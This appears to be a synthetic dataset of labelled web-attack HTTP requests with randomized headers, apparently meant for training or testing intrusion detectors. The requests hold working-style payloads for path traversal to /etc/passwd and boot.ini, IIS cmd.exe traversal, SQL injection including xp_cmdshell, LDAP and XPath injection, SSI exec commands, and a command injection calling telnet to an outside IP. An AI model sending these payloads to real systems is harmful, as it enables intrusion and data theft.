Warning: 068 www.nEtms.tiff:791 "hzcetNt0o1a8aftr" "Thu, 03 Dec 09 09:45:12 UTC"
X-Forwarded-For: 15.27.14.91
X-Serial-Number: 208175776515023
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43431
Start - Id: 46189
class: PathTransversal
GET /nyn4mos/85m0/eyd84Pi6C/St6YJhB/r9IBPvd/r3deLDaOks6v/ale/ft/iOw7.cfm?sta8Hht4shw8a6e=5&Ka3uRlibFFed=%24Huoonuid3estd&Vn2Mnulli=2968897&octrbieBreci=mo%28NeoFprocessing-instruction%5Btg&oaNiee8=uBcatamiab+hese&@MPsH.6AD27between=Isincludeh&erpaL=oGGmjw.N&52jdho=Osbwoan&Uc0ictSl4gSIu=25818836&ihRapzstte=5975421&vxiAxhfe=2795143942&esi=%2F%2C%2C%2C%2Fmstt%2FiMj%2Fpasswd&cno=aS+9nrncm+aea+qAt&G-17A08J=iBW&nel=kZYvqgur-9 HTTP/1.1
Host: www.5peroeeeod.gov:3
Connection: close
Accept: application/rtf
Accept-Charset: *;q=0.5
Accept-Encoding: deflate;q=0.3, compress;q=0.2, identity, compress;q=0.2
Accept-Language: *
Cache-Control: max-stale
Client-ip: 68.94.47.234
Cookie: 3xmldC3uDyQUi2=0132598;Qa1stdinJXgboot.iniH=48662
Cookie2: $Version="82"
Date: Sun, 12 Jun 05 20:11:32 GMT
ETag: W/"MLizzqbNdRPN0jiUSt"
Expect: 100-continue
From: sloo@sd406oko.ch
If-Modified-Since: Tue, 02 Mar 04 17:16:24 GMT
If-Unmodified-Since: Fri, 03 Apr 09 16:48:18 CET
If-Match: "NEpaVxwPI-12jrfUL6"
If-None-Match: *
If-Range: "-Rj9Lq3GxzlX@C-3r-"
Max-Forwards: 98
MIME-Version: 2.5
Pragma: p=famajhe
Proxy-Authorization: Basic Z2Q2bmVlOmFsaWd0aA==
Authorization: g4eet lfeuzoi7=eeeeogin
Range: 4-,9786-16,8-
Referer: /qaowlei/aoetaHl/mgeeIem.mpg
TE: trailers,chunked;q=0.4
Trailer: Host
User-Agent: Mozilla/5.2 (X11; U; Open BSD i386 2.1; lt-te; rv:6.3.2) Gecko/04905820
UA-CPU: x86
UA-Disp: 411,052,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 939x7286
Via: 6.5 185.106.63.180
Transfer-Encoding: compress
Upgrade: amiap/9.1
Warning: 885 150.132.83.196:7 "UN6M8draouta3nienwag" 
X-Forwarded-For: 249.22.33.20
X-Serial-Number: 308717764624238
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46189
Start - Id: 36564
class: OsCommanding
GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.imt5uNana.org
Connection: u4Det
Accept: image/png;q=0.2
Accept-Charset: windows-1257
Accept-Encoding: 
Accept-Language: i-zthCeemh, n-M1;q=0.8, Ho-t;q=0.2, ur-4S, o1idit-o
Cache-Control: no-store
Client-ip: 199.190.231.15
Cookie: j6WQKtdR=d_B7U;madsn=lrRnszyaaS9'i;fnwt0=53888
Cookie2: $Version="655"
Date: Sun, 28 Nov 04 11:09:38 UTC
ETag: "._sHr99T4AKY.QbUteoU"
Expect: e2h0
From: osNAoh@aHn2nry.de
If-Modified-Since: Mon, 17 Sep 07 02:32:52 GMT
If-Unmodified-Since: Fri, 17 Oct 08 02:22:47 CET
If-Match: "p1IY0hBynYBC.mNb"
If-None-Match: *
If-Range: *
Max-Forwards: 55
MIME-Version: 4.8
Pragma: uyT8t9do=eyre6
Proxy-Authorization: 4eitC tieta=unrJ6ewe
Authorization: NTLM bmdpdWx0bGdlZ3R3bzlzc0Vsb2Vhd3E0dXNvZ3dpdWhvZ2F1b3hlYnBTdmk0aTU=
Range: -961935,910376-
Referer: /aqsot/8onsY0s/io2td/lcollas/teakta6s.tar.gz
TE: chunked;q=0.4
Trailer: If-Match
User-Agent: fsaadxwepwsnaUse3dvA
UA-CPU: Sparc
UA-Disp: 1693,583,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 547x5195
Via: HTTP/2.9 186.100.131.110
Transfer-Encoding: identity
Upgrade: iOe8/3.1
Warning: 144 52.115.217.55:7498 "trdsyhirr51fyxZdk" 
X-Forwarded-For: 232.88.214.55
X-Serial-Number: 33496662681000
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36564
Start - Id: 35608
class: XPathInjection
GET /mCOWM6Wi9etcGYnF.cgi?Emdw=m6sjnoj&p117=68&er=ti%3A%3Ae%5CitR+q%28%7Eeaamwhere&h2dokhrpetc=awa6trm%27++or+++6+%3C++++count%28path%2Fchild%3A%3A*%29+++or+++%27noqdsrsR%27++%3D+%27&t7ueseeaomvAmTo=ne&Tr1xbO5div=n.msX HTTP/1.1
Host: 88.65.239.184
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: identity, gzip;q=0.3, compress;q=0.4, gzip;q=0.4
Accept-Language: *
Cache-Control: no-cache
Client-ip: 71.205.202.98
Cookie: vQm5.U-Sl=1e;azecpasswdF=eLE50U9pM_8;2s=csyaiA4e3lH-m
Cookie2: $Version="6"
Date: Thu, 01 Sep 05 16:47:49 CET
ETag: W/"61HzeJ@rKHFyCN-"
Expect: 100-continue
From: oiekA@q3dEy.org
If-Modified-Since: Wed, 07 Mar 07 10:37:39 UTC
If-Unmodified-Since: Thu, 08 May 08 11:29:37 GMT
If-Match: *
If-None-Match: *
If-Range: "X@7uJwphzcqAWxX"
Max-Forwards: 4
MIME-Version: 4.8
Pragma: o=nq1rfn
Proxy-Authorization: eNmRc aseer=gr3Gfc90
Authorization: Basic dEFZd3I6c2VhYQ==
Range: 1278-6
Referer: /ehr0/clgngzeI/1fipysah/iwnd5j/ehnoa.gz
TE: trailers
Trailer: Host
User-Agent: y1earuge (ryc4KJ; t4b91Ar; rKhNl6jvmB; b-mR.ZyEN)
UA-CPU: x86
UA-Disp: 458,730,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 138x439
Via: 3.6 171.109.199.195, HTTP/5.5 72.120.91.146
Transfer-Encoding: gzip
Upgrade: tetnr/7.4, fcN/6.9, rTt/7.4, smennp/6.7, mvsass/6.7
Warning: 642 225.30.125.246 "ai7adc" 
X-Forwarded-For: 28.16.209.118
X-Serial-Number: 65275952070459353
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 35608
Start - Id: 44086
class: OsCommanding
GET ..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.taOSste.biz
Connection: NsYe
Accept: text/*
Accept-Charset: euc-jp;q=0.9, cp-936, windows-1251, windows-1254;q=0.5, iso-8859-8
Accept-Encoding: compress, identity;q=0.5, gzip;q=0.5, compress, compress
Accept-Language: *;q=0.8
Cache-Control: max-age=3842
Client-ip: 56.136.139.128
Cookie: oIiv=vnqr_b
Cookie2: $Version="0"
Date: Mon, 11 Oct 04 06:53:07 CET
ETag: "5Sy.3KRtylhzA5H"
Expect: ugrhejx
From: ixam@eaec.uk
If-Modified-Since: Sat, 10 May 08 02:22:46 GMT
If-Unmodified-Since: Wed, 01 Feb 06 10:47:41 UTC
If-Match: "KUoJ4vK7fOF8Y3B"
If-None-Match: *
If-Range: "Bgk78tIdC6rpnZuB2R"
Max-Forwards: 131
MIME-Version: 0.4
Pragma: o8na='dama'
Proxy-Authorization: NTLM YTlha3RlZjlua29weWVzb2s3MW5yemFoMm5wbk4waVJzZW9ndG4zTGhpOGh0aQ==
Authorization: Basic dmVtdGw6NHRoZWhl
Range: 70-
Referer: http://www.mtyat.it/estHso/lhf4c.dll
TE: trailers,deflate,deflate
Trailer: Authorization
User-Agent: arn6s4f/8.2
UA-CPU: x86
UA-Disp: 6409,6413,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 1501x189
Via: w2he/7.4 www.ohoaiall.png, tatd/2.3 www.lrtNeuo.htm
Transfer-Encoding: 2cou23
Upgrade: unHis2/9.7, sDw/8.7
Warning: 085 103.13.130.10 "4nt6qytseorniY" 
X-Forwarded-For: 91.48.222.8
X-Serial-Number: 388289600968011
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44086
Start - Id: 42253
class: SqlInjection
GET /opositionfL0boot.inidivgjMkB/aidanspe/e1eaesst1.swf?nhyswaITm=lfagiutdor&gizzNemh=%27+++%29+++++UNION+ALL++SELECT+++hoeLhe+FROM+++++rto3ec+++WHERE++++%28++++%27%27++++%3D+%27&5esoilMks7sh0s=7YB%40oA4qxB6&hincludeNR.Jxml4N=qstdinef&e23sseNa=gqM1TFwGq&usGne=s HTTP/1.0
Host: www.ldtedis.gov:80
Connection: keep-alive
Accept: video/*;q=0.4, text/xml
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 164.216.181.230
Cookie: rapnngg=49487
Cookie2: $Version="55"
Date: Mon, 31 Mar 08 08:46:51 GMT
ETag: W/"3EUs5XR7C38VJfgd-18V"
Expect: 100-continue
From: Ngynaai@esersh.uk
If-Modified-Since: Mon, 01 Mar 04 06:04:42 CET
If-Unmodified-Since: Thu, 29 Apr 10 23:36:51 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 15 Feb 04 02:46:11 CET
Max-Forwards: 8
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: NTLM aWd1eTNuZHNvSTdmd3VkeFJzcHFodHV0dHlmRGVsNm8=
Authorization: NTLM ZWVzb255aGhtdGRhZTVob2FldnVJOTd5eXlmRXQ0M3N6dDlhYXRpdG50bGhFNjY1
Range: 4539-14148,-19,934-
Referer: http://www.8diata.cz/onheh/Tsvga/eu6ot.cgi
TE: chunked
Trailer: Accept-Language
User-Agent: a7r1r3teoyry6e
UA-CPU: PowerPC
UA-Disp: 8058,0040,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 108x2342
Via: FTP/4.2 www.mh7Ikaii.html, 2.1 102.28.194.89, HTTP/9.0 166.196.13.111
Transfer-Encoding: gzip
Upgrade: gtaeas/6.8, ae9e/5.6, rdaei/1.7, ilto/8.7, n5w/5.4
Warning: 939 3.193.4.247 "eeviCoadbEttmsy" 
X-Forwarded-For: 42.114.104.151
X-Serial-Number: 29366252
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42253
Start - Id: 41033
class: SqlInjection
GET /eqe.jpg?8o2I9Uil=uQg&ila8hsth=155741&gaodaauud5x=%27%3BEXEC+++++master.dbo.xp_cmdshell++%27cmd.exe&ad6wl2lixtn0=4806389774&Sbmaoeuxdaon=aNRMJ&NenpN=Ltt&1t0xgn@2connect3=RqnribAdta&wreeEfhT1o=53&tjhDjsltacorsh=m7_xc-%40 HTTP/1.0
Host: www.eHtto7f.biz
Connection: close
Accept: */*
Accept-Charset: iso-2022-kr;q=0.9, windows-1258;q=0.8, isiri-3342;q=0.5, shift_jis, x-mac-roman
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 206.200.164.185
Cookie: iiEc=e-HKN34A;geyoNie=kJr8;EsuWwfg7iu=lekp;5tn=0274;ENidrm=123013
Cookie2: $Version="1"
Date: Thu, 23 Sep 04 08:18:52 UTC
ETag: "DBTKzrNI5ravG@LB-7a"
Expect: 100-continue
From: a1tlic@rsdn.ch
If-Modified-Since: Mon, 17 Apr 06 16:05:47 CET
If-Unmodified-Since: Mon, 30 Apr 07 16:11:14 UTC
If-Match: "8IsSfI-pj9BA.VO"
If-None-Match: "a_5XuUri--UT4e2Ll4t"
If-Range: Thu, 19 Feb 09 16:59:48 CET
Max-Forwards: 75
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: dEwdh oSgoauto=ctAcmei
Authorization: Basic bmhsbmV0cmU6SVVvb2Q=
Range: 956-40926
Referer: /rohoostr/frii/8gjerr.asmx
TE: chunked;q=0.2,trailers
User-Agent: Mozilla/5.0 (Windows; U; Win98 1.8; ii-tk; rv:9.0.2) Gecko/82831200
UA-CPU: PowerPC
UA-Disp: 3796,7783,32
UA-Color: color16
UA-Pixels: 6152x736
Via: FTP/4.1 www.3n5qmpt.htm:47, FTP/8.6 www.npluon.css, HraieI/4.7 www.ac6keih.shtml
Transfer-Encoding: compress
Upgrade: ueiDt/4.5, Y8a3e/0.2, set/3.6, emlvo/5.7
Warning: 151 www.aseNtTKn.shtml "wntnn1nnvnehztTtrwO" "Fri, 15 Dec 06 03:39:44 GMT"
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41033
Start - Id: 45647
class: PathTransversal
GET /defdp@hU/sh4/nwtdcch4ra/ynV./rcrilplzIamdektlafi.msf?riohtittuh=w%3A%5Cwinnt%5Cboot.ini HTTP/1.1
Host: www.aseb2o.it
Connection: keep-alive
Accept: application/*, application/*;q=0.2
Accept-Charset: koi8;q=0.6, iso-8859-1;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 29.51.224.69
Cookie: replaceZDkD=25
Cookie2: $Version="427"
Date: Wed, 19 Sep 07 17:44:57 UTC
ETag: "RTvIwIez8XcexdzB"
Expect: 100-continue
From: f6eo@ixbm.net
If-Modified-Since: Mon, 17 Jan 05 06:41:48 GMT
If-Unmodified-Since: Fri, 08 Jul 05 04:39:23 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 374
MIME-Version: 6.6
Pragma: ljrm=cetwse
Proxy-Authorization: Digest realm
Authorization: 8edaa chth=iIlaptd
Range: 6451-1616,73067-
Referer: /sbs4/tategaoe/pfauh.php4
TE: gzip,trailers
Trailer: If-Match
User-Agent: Mozilla/5.1 (X11; U; SunOS sun4u 7.2; nd-aa; rv:1.3.5) Gecko/85927000
UA-CPU: StrongARM
UA-Disp: 6211,216,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 822x7787
Via: HTTP/9.2 www.taayee.shtml
Transfer-Encoding: npem; 4tirq1=vykbdsk
Upgrade: 8mc5/8.9
Warning: 979 249.143.44.161 "mpeqyef6" 
X-Forwarded-For: 48.145.225.109
X-Serial-Number: 4318148965798
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45647
Start - Id: 37410
class: LdapInjection
GET /vbGirrjm4VmKBT.jpeg?1489da5Voxoze=qVE6aLere&afiuhhaa=ha1Eaat+%3E%25mRgh4y&ntiexjtiaa2=75296&tiiiatetu=664726&zqt=jT0&ni3sx2=mh%26%3C&n8tnNntzru=%3D++e%2B&ri=tmpiep1tDlsodn&kevth=uP2&fay7=iCNSw9&rtw1bEs=A%3E HTTP/1.1
Host: www.rptckn.ch
Connection: ogaaoej
Accept: */*
Accept-Charset: hz-gb-2312, windows-1251
Accept-Encoding: *
Accept-Language: o-erznrota;q=0.3
Cache-Control: max-age=880
Client-ip: 112.62.22.134
Cookie: ato1bhant=on;Eaocto=osuepEetMz;fromtoptwhereFR=)    ( | (displayName=had*) (name   =had*  )(  mail=had*)
Cookie2: $Version="8"
Date: Mon, 22 Mar 04 01:21:59 UTC
ETag: W/"fYGy0yiXzgbqmdeFk"
Expect: jrjaPt=o7et7rt0;Tedahis
From: Nhpimenh@ddh2omeHLt.ch
If-Modified-Since: Wed, 10 Jan 07 10:03:19 UTC
If-Unmodified-Since: Tue, 19 Oct 04 15:51:03 UTC
If-Match: *
If-None-Match: "qEWy-oZz-gnU0bX-gn"
If-Range: "PyNpTl3Zyu.Tid-"
Max-Forwards: 9549
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Basic cGVoZWpvOmkzeWxlb2Y=
Authorization: Digest response="CF3cfec9c4A22FAbEF26d0C34ADe4EFb"
Range: 43109-087928,-7,22480-
Referer: /tnl5/tgmoryae/a0ik/ocwa.gif
TE: deflate,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/0.7 (X11; U; Solaris 3.4; sl-o6; rv:3.9.0) Gecko/24463098
UA-Disp: 143,2118,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 005x049
Via: FTP/9.9 82.196.149.117
Transfer-Encoding: gzip
Upgrade: sAu/9.8, dttde/7.7, daa4lr/8.7, ouaTra/3.5
Warning: 856 www.lyor.js:3401 "doia0real" "Thu, 07 Jan 10 05:39:49 CET"
X-Forwarded-For: 109.165.6.33
X-Serial-Number: 50103674881121
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37410
Start - Id: 40859
class: SSI
GET /uB74gG/h6eietos/9iowauL7k/GepGevalX-jXHbinM5/rbmtl9ar0eyi/oZneeOc/xtermselectQ75YwYe/Zuwindow.open/u.gGlCUstdin/cn6Hr_/bHvrOP3py4.swf?oaenihnveeseui=scriptrh&sZUformgevalmetaF3nGw=%3C%21--%23odbc++connect%3D%22wd0ne1r%2Cyp7au%2Cimo%22++++statement%3D%22select+*++from+++++eheh%22--%3E&ayinfay=02&cpawotdTEm=snloryaX%5Dsaebn&sS=hd&loovC8ARkTkbe0t=cRteiaecA0Eo&settiv=s&s9Iu=ilrqv&replacepTx=otPofc5bsoety&lxt=ietbaamtrenmO&abhvetromt4mi=oM0qUm8yipyy&ac7tghnohdudq=346646&EAT7l5=sock_stream&tofeEG=74 HTTP/1.0
Host: 52.160.75.124:9501
Connection: keep-alive
Accept: text/*, text/xml, image/jpeg
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: tar-iteoie, eidleoet-eojla, obs2ic-L
Cache-Control: no-store
Client-ip: 183.188.60.40
Cookie: rsrtiTidim=577762008;GLHx6j6oJti1=krasigTxO4gO;noO5uos=5;n4awsbdtnex4=n?ne;hsino=nsthcNDPEyas;LlCrarechoGQhome=rcpps
Cookie2: $Version="08"
Date: Sun, 01 May 05 22:22:51 GMT
ETag: "l8YqCEbciYrBlazH.KJE"
Expect: ahutgh=Zrti
From: ednaAi@brso.de
If-Modified-Since: Fri, 13 May 05 10:08:37 GMT
If-Unmodified-Since: Tue, 08 Jun 04 07:31:29 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 9065
MIME-Version: 2.6
Pragma: aErmoT='na'
Proxy-Authorization: NTLM b2xRbmFjZWVwOW41c28yYWxxZUw3Um1kaXJJdXNvZW5ubHZoZGU2ZG1hZ2ls
Authorization: Basic ZmVsb2Vtcjpuc3NlZWVhbA==
Range: 662370-,944629-04,749394-
Referer: http://www.eshinS.be/djt14mr/dpoRi.jpeg
TE: trailers
Trailer: Date
User-Agent: nkehead
UA-CPU: x86
UA-Disp: 2426,7787,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 5993x410
Via: 5.9 203.65.239.214:4
Transfer-Encoding: deflate
Upgrade: iTdaap/8.9
Warning: 001 94.18.227.26 "tarnYgrgo4d" 
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 49586702317462
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 40859
Start - Id: 46405
class: PathTransversal
GET /0AZdropE5Tv/3z-k2uJr7R/aApytsocu/elelqtyvgt/tIv4rmN5GFDg4DsU-d0j/iWiEhHuee3nh/slGtKndHC/t1nro/mv-rFneQy5Q5/tYwER_FvKjJd@c8d/dneNiimsrtemg.png?hsa=iEWQjHn55ni&ur6y=jher%26documenth&qhh=ctmaett&ev=lbyn&d30Y-exec=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd HTTP/1.1
Host: 175.191.39.224
Connection: close
Accept: audio/basic
Accept-Charset: *;q=0.7
Accept-Encoding: identity, compress;q=0.2, gzip;q=0.9
Accept-Language: *;q=0.5
Cache-Control: it=edt
Client-ip: 218.249.144.221
Cookie: 1rApqhEionice=jainclude;coaso=50;guhddos=E >ee;doccetcr=YV(hh;Hie=5mN0nsdemifurnAa
Cookie2: $Version="93"
Date: Sun, 04 Mar 07 12:55:25 UTC
ETag: W/"AuAN-mgN8NIK-@ZSw.r"
Expect: 100-continue
From: eitn@airwo.uk
If-Modified-Since: Wed, 05 Aug 09 19:32:22 GMT
If-Unmodified-Since: Mon, 19 Feb 07 13:50:28 GMT
If-Match: "yQa-3QOZ2XEAj@zOY6kt"
If-None-Match: *
If-Range: *
Max-Forwards: 49
MIME-Version: 3.5
Pragma: OmanePBh='e'
Proxy-Authorization: NTLM bXQ0aTZtczlyc2llb3dEc25rcTFoZHNoaUVnUHRvYW5kRWV0
Authorization: NTLM ZWNyc2hIMWpkY250bnRmaGVlaFNiZTJmb2llZGRuMWU0
Range: 0-,-1441,-234089
Referer: /sriu.cfm
TE: gzip;q=0.2
Trailer: TE
User-Agent: Mozilla/1.1 (Machintosh; U; PPC Mac OS X 2.4; te-na; rv:1.2.8) Gecko/83494234
UA-CPU: MIPS
UA-Disp: 9745,801,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 999x039
Via: 7.0 251.86.133.152, 8.0 www.hAee.tiff:908
Transfer-Encoding: identity
Upgrade: 1qohtl/5.6, dsgali/4.9
Warning: 321 www.qhjnlsh.gif "tzcnI8rhloto3rnecm" 
X-Forwarded-For: 141.149.156.77
X-Serial-Number: 22445
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46405
Start - Id: 38952
class: LdapInjection
GET /iaj08SXAG@pEiKKBG.gif?Z-9includeJOnAbgsound38=alM&aoiQ=4&jancnr4Oamnli=bnd&ns9ZKB62hTpL=+-hD+&ne1oe=psubeiaejis7o&zactf=et%7EHrhtaccesi&gpswiaskedatn9a=sUK7ZeYm&b71ddhautcezlon=e.hv87&ettHapnpam1=0&pj7A4Q=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&meiiacSlcjb3ute=%28nRu%5Boh6execaoeDl&cqV5HRw=zWxd++eAiwhereaposition HTTP/1.0
Host: 46.206.1.189
Connection: close
Accept: */*
Accept-Charset: x-mac-ce, x-mac-arabic;q=0.8, euc-jp;q=0.1
Accept-Encoding: 
Accept-Language: no-0hdtse;q=0.8, e9-di5weeut
Cache-Control: max-stale=8267
Client-ip: 69.146.201.136
Cookie: bceesenryt4s=9142172;pssEaiaod=36481;ishhkrowcS=l@jQ8q;dqbnesS=iTT7Wnj;g8bl9xgnetticct=58327622
Cookie2: $Version="1"
Date: Tue, 08 Apr 08 22:07:07 UTC
ETag: "SRCGudR8eFtiS4Ao6"
Expect: 7onuerm
From: merdf@ssdhtag.cz
If-Modified-Since: Wed, 19 Apr 06 22:34:26 CET
If-Unmodified-Since: Fri, 26 Jan 07 04:04:34 GMT
If-Match: "_KGCGIjngOU45m@wrC3"
If-None-Match: *
If-Range: *
Max-Forwards: 0060
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: NTLM dkplbGtuZjJBYUpvcFNzeVNJYXVuNk5VbmVpZm5ya3QxZQ==
Authorization: rwetrw kiwx=qthteihe
Range: 678-706492,70758-,6439-
Referer: /Wacnu/EneRoeo.php3
TE: trailers
Trailer: If-Modified-Since
User-Agent: qfJ7npf0 http://www.Tgsslc.com
UA-CPU: 68000
UA-Disp: 8492,4170,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 0621x5666
Via: FTP/1.6 www.lNind.shtml, HTTP/3.7 178.46.45.83
Transfer-Encoding: compress
Upgrade: hnegB/7.8, nnade/5.0, ony/9.4
Warning: 175 55.57.212.248 "yxhnh1o3It" 
X-Forwarded-For: 97.3.123.50
X-Serial-Number: 498357729
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38952
Start - Id: 35343
class: SqlInjection
GET /eoxlehDb4tceeo/u6sR6QQ5GZW7sg1Q/jquthr/sh6ieoymx/urGbw1Q.swf?fthpr=it&wbr4om=+OR+++++2+++++%3E+++1&sfesq2lemdfm=%40to%7EeZ6delete&08gcupdate=e&0ivOs=78&smfcxbeteEu=sifo&fmpoptZvar1QR=qlIn3estenot&_Fe-q3nvR=zig HTTP/1.1
Host: www.tdsSiw.it
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: ct-e, wI8l8o-eoNt
Cache-Control: 2ao=lutLiuI
Client-ip: 85.135.241.126
Cookie: 4tbdhsoY=3755067
Cookie2: $Version="2"
Date: Fri, 13 Feb 04 05:16:36 CET
ETag: W/"3xeU3JJzY4QgQz3Wd"
Expect: 100-continue
From: 2cs3fs@4loUnehlAe.it
If-Modified-Since: Thu, 13 Aug 09 07:14:53 UTC
If-Unmodified-Since: Tue, 27 Dec 05 21:51:56 CET
If-Match: *
If-None-Match: "CsjpdOm.FkF-1bY"
If-Range: "YQpP6vnPRrX77IlX"
Max-Forwards: 12
MIME-Version: 1.4
Pragma: s='g7oc0'
Proxy-Authorization: NTLM b25yZlM5N2Roc25lb29uc2dyaXN4dHJiZmVnYWRlbGVOZm1pd3RsdGVJ
Authorization: 4uNtt fsb8x=wPysovEa
Range: 16442-228208
Referer: http://isca.st/qat1hqe/auiarr/tbhym.jsp
TE: trailers,deflate
Trailer: Accept-Language
User-Agent: easuL (t-DjH-b; eMQdZ7_a)
UA-CPU: 68000
UA-Disp: 787,9099,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 739x825
Via: FTP/3.8 www.sDUaIz.shtml, 3.3 www.unns.jpg, 2.0 120.121.77.67
Transfer-Encoding: compress
Upgrade: ohz/1.8
Warning: 597 www.ssytddta.jpg "8Lti" "Wed, 10 Mar 04 17:59:42 UTC"
X-Forwarded-For: 70.158.64.159
X-Serial-Number: 49332836434865921250
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35343
Start - Id: 40027
class: SSI
GET /gdnwNnc9lO8UGkodXb/ehgr7vvi6lpddt/pzolAKETvOXAwz/E9ObinXtmpIc/jyJcwHegNQIv@/e_8Ee.f/ndh9NtKicmonM3y6/rTFU_i.png?cauui=rcat&bOeamieu8ie6=o%404ISHQsX&gw=HncCm%3Divaradocumenteea&el=912&eCn7UNXI89xX=e6E2seRbgsound8i&FaCF=22&heos=a2r6ceqww0nehocih&iEiaoosicn=61745754&faFesiw=139&oftctiSn3uian=%3C%21--+++++%23exec+++cmd%3D%22%2Fbin%2Fls++-l++%2Fhome%2FyklEmc5yk%2FuyV9sh%22+++++--%3E HTTP/1.1
Host: www.rdpnYna839.biz:4
Connection: goeybu
Accept: text/*;q=0.9, image/jpeg
Accept-Charset: iso-8859-7, euc-cn, gb2312;q=0.6
Accept-Encoding: *;q=0.2
Accept-Language: strlhonh-KNeo, twvp-lacboi;q=0.0, S-aAtrnshp
Cache-Control: aomest='OltjcG'
Client-ip: 3.134.210.79
Cookie: tsNSc=28623;twohp=t']s&;14g4fhnXaA= wmleim aonift
Cookie2: $Version="286"
Date: Wed, 25 Nov 09 24:58:51 UTC
ETag: W/"InT@8Fc@jEaB.CC3M5"
Expect: ness
From: bic3us@lb0or.fr
If-Modified-Since: Thu, 19 Nov 09 17:00:06 GMT
If-Unmodified-Since: Fri, 11 May 07 09:56:50 GMT
If-Match: "j1LaojyNq3nlawlCSz-l"
If-None-Match: "kVvDk2To96B93gl9c8j"
If-Range: *
Max-Forwards: 50
MIME-Version: 9.8
Pragma: 5=utjsec
Proxy-Authorization: 0uee tt6qsn=eithco
Authorization: NTLM Z2FvdWlhZ3VUcmNpQXNhZWVuYXNlYTBzZXRhbHJuZTNlZQ==
Range: 41683-1312,-3
Referer: http://itetn4.biz/obDo/titAtjs/qsnr/tCto4soe/2eneet.pl
TE: deflate;q=0.4,trailers
Trailer: Warning
User-Agent: Mozilla/9.1 (Windows; U; Win98 6.6; iw-nw; rv:3.0.2) Gecko/70517180
UA-CPU: Sparc
UA-Disp: 1313,496,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 5394x1347
Via: Nrnoel/4.3 www.oaaas.png:85930, 1.4 128.124.42.106:03, HTTP/9.5 www.H3sLt.gif
Transfer-Encoding: deflate
Upgrade: 9gTeo/9.5
Warning: 794 212.70.161.46 "nC7teHarp0di5fna" 
X-Forwarded-For: 92.41.36.53
X-Serial-Number: 18116
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40027
Start - Id: 36805
class: OsCommanding
GET /rTJQBu_.css?ynhe=sgeZheihgtinrht&raaefm7St=h%26%3E+tfneihotlxmlS&Y70.=5992976332&AEAinQMyL6i_=ow%3Ayjenamo&3Haoeoq0t6sdou=amM6&Zpassthru3vYbilvtBj=%22+%3B+telnet++++201.63.51.148+++80++%3B&oyt1oazpbee=eGgMMtcRRO5&et=N&l@VfperllocationikdY=n&RFsba=lAcd HTTP/1.1
Host: 17.183.78.221:80
Connection: close
Accept: text/*
Accept-Charset: euc-kr;q=0.5, windows-1254;q=0.7, ks_c_5601-1987, utf-8, x-mac-greek;q=0.6
Accept-Encoding: gzip, deflate;q=0.7
Accept-Language: zie-afmOo;q=0.8, ukOhtso-Bt4
Cache-Control: no-cache
Cookie: lapoa=03711;tn26nete5r=niswon>Astn(y)l'ewphps;a.R_havingphpvXpmail=Dhh2usangSmochaM2q;eOdm38zitNheb3T=72
Cookie2: $Version="03"
Date: Mon, 16 Feb 04 19:58:23 GMT
ETag: "2i-Tsg8qHsrARqq@"
